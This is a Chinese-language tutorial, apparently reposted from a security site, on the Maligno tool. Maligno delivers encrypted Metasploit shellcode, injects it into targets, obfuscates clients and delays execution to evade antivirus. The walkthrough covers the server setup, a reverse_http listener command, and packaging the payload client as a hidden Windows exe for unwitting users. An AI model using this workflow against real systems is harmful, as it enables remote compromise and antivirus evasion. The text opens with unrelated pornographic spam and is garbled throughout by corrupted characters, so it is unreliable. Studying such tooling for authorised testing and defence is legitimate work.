欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Maligno 一個(gè)開(kāi)源的滲透測(cè)試工具

  發(fā)布時(shí)間:2016-04-10 12:24:50   作者:佚名   我要評(píng)論
今天我想介紹一個(gè)能夠在滲透測(cè)設(shè)中幫到你的工具。Maligno是一個(gè)基于FreeBSD許可證的開(kāi)源的滲透測(cè)試工具。使用Python編寫,最大限度與Metasploit兼容

今天我想介紹一個(gè)能夠在滲透測(cè)設(shè)中幫到你的工具。Maligno是一個(gè)基于FreeBSD許可證的開(kāi)源的滲透測(cè)試工具。使用Python編寫,最大限度與Metasploit兼容。
它利用Metasploit framework框架,尤其是msfvenom,來(lái)生成AES加密的shellcode,并且在傳輸前會(huì)編碼。
Maligno是非常有用的工具。它是為滲透測(cè)試設(shè)計(jì)的,但是也可以用于其它不同的場(chǎng)景。Maligno的通信非常靈活,可以讓它仿真惡意軟件的行為或通信模式。
Maligno的架構(gòu)由客戶端和服務(wù)端組成。Maligno各部分使用HTTP和HTTPS協(xié)議通信。

072015_1303_MalignoOpen1.png


客戶端和服務(wù)端可以配置成模擬特定的C&C通信,或者用作對(duì)手復(fù)制的一個(gè)部分(adversary replication,對(duì)手復(fù)制是滲透測(cè)試中的一個(gè)新概念,指用工具模擬黑客攻擊,檢查安全機(jī)制的有效性)。

客戶端可以連接Maligno,下載加密的Metasploit載荷。當(dāng)shellcode被下載下來(lái),客戶端解碼和解密之后將其注入到目標(biāo)機(jī)中。

客戶端是David Kennedy的PyInjector的擴(kuò)展版本。它支持各種操作系統(tǒng),比如:Linux,Windows,以及OS X。Maligno已經(jīng)具備了你需要的任何客戶端和任何載荷。它有一個(gè)混淆器可在生成代碼時(shí)混亂它。

Malingno另一個(gè)好功能是載荷延遲執(zhí)行,規(guī)避殺軟的啟發(fā)式掃描。

服務(wù)端部分基于Metasploit來(lái)工作,事實(shí)上,它能夠用msfvenom動(dòng)態(tài)生成針對(duì)各種類型目標(biāo)的載荷。它也支持多載荷和多連接。多虧Metasploit的輔助模塊,它支持Socks5a代理。

如果你想在特定的IP和網(wǎng)絡(luò)散布載荷,Maligno支持scopes。如果一個(gè)請(qǐng)求不在配置文件中的任何一個(gè)scops中,你可以配置“Last Resort Redirection”,這樣就能禁止把載荷傳送到不在scope范圍內(nèi)的目標(biāo)上。

安裝

安裝非常簡(jiǎn)單,你可以直接在這里下載

解壓文件,然后執(zhí)行安裝腳本。

復(fù)制代碼
代碼如下:

# ./install.sh

它會(huì)詢問(wèn)你創(chuàng)建用于SSL模式操作的證書(shū)的相關(guān)問(wèn)題。

配置

在安裝完成后,你可以修改服務(wù)端的配置文件,打開(kāi)它,修改使用你的載荷和IP。

這里有一個(gè)配置文件的完整解釋:

復(fù)制代碼
代碼如下:

# cat docs/server_config.explained

創(chuàng)建客戶端腳本

復(fù)制代碼
代碼如下:

# ./clientgen.py -f youconfifileserver.xml -s true


072015_1303_MalignoOpen2.png

這個(gè)命令為你在youconfifileserver.xml文件中配置的每個(gè)載荷生成一個(gè)Python腳本。

開(kāi)啟Malingo服務(wù)端

復(fù)制代碼
代碼如下:

# ./maligno_srv.py


072015_1303_MalignoOpen3.png


Metasploit listener

現(xiàn)在,我們進(jìn)入到Maligno文件夾里的msfresources文件夾中,執(zhí)行Metasploit listener。Maligno為了快速加載,替我們?yōu)槊總€(gè)載荷創(chuàng)建了一個(gè)簡(jiǎn)單的腳本。

復(fù)制代碼
代碼如下:

# cd msfresources
# msfconsole -r 0_standard_reverse_http_192.168.226.139_4444.rc


現(xiàn)在我們把Maligno環(huán)境加載并運(yùn)行起來(lái)了。

在真實(shí)場(chǎng)景中,我們無(wú)法欺騙用戶,勸他安裝運(yùn)行Python腳本所需環(huán)境。我們不得不把Python腳本轉(zhuǎn)換為exe。

Python腳本轉(zhuǎn)為exe

在完成Maligno Python腳本創(chuàng)建后,為了適用于各中環(huán)境,我們不得不轉(zhuǎn)化它。

我們需要下面的軟件:

復(fù)制代碼
代碼如下:

Python 2.7 32bit for windows
Pyinstaller 2.1
PyWin32 32bit
VM Windows 7 32/64


在自己的Windows機(jī)器上安裝Python2.7。從官網(wǎng)下載并安裝它。

接下來(lái),打開(kāi)一個(gè)CMD shell,進(jìn)入C:\Python27\里的scripts目錄。

復(fù)制代碼
代碼如下:

C:\Python27\Scripts\pip.exe install pyinstaller

或者,如果你在Windows的環(huán)境變量中安裝了Python的路徑。

復(fù)制代碼
代碼如下:

C:\pip.exe install pyinstaller

下載最新版本的Pyinstaller,下載后會(huì)自動(dòng)安裝。

現(xiàn)在該安裝PyWin32了。在這之前,如果你選擇msi installer,你只需點(diǎn)擊netx直到結(jié)束。默認(rèn)配置是正確的,它會(huì)從windows的環(huán)境變量中找到Python的安裝路徑。

為了在下載階段能夠解密載荷,安裝crypto模塊很重要。

復(fù)制代碼
代碼如下:

C:\easy_install.exe crypto
C:\easy_install.exe pycrypto

現(xiàn)在我們準(zhǔn)備利用Python腳本創(chuàng)建我們的exe

打開(kāi)Linux攻擊機(jī)(我們?cè)谀抢飫?chuàng)建了Maligno服務(wù)端),然后選擇一個(gè)腳本,拷貝并粘貼到Windwos虛擬機(jī)中你指定的文件夾。

進(jìn)入那個(gè)文件夾,并執(zhí)行pyinstaller

復(fù)制代碼
代碼如下:

C:\pyinstaller.exe -F -w --onefile 0_standard_reverse_http.py

如果沒(méi)有錯(cuò)誤,pyinstaller創(chuàng)建一個(gè)名為dist的文件夾,到里面我們就能找到.exe文件,可以使用它測(cè)試你的載荷。

資源:

Malingo v2.2由Encripto發(fā)布,可以在下面的地址中免費(fèi)下載。

https://www.encripto.no/nb/downloads/tools/
https://www.encripto.no

* 翻譯自resources.infosecinstitute,轉(zhuǎn)載請(qǐng)注明來(lái)自FreeBuf黑客與極客(FreeBuf.COM)

相關(guān)文章

最新評(píng)論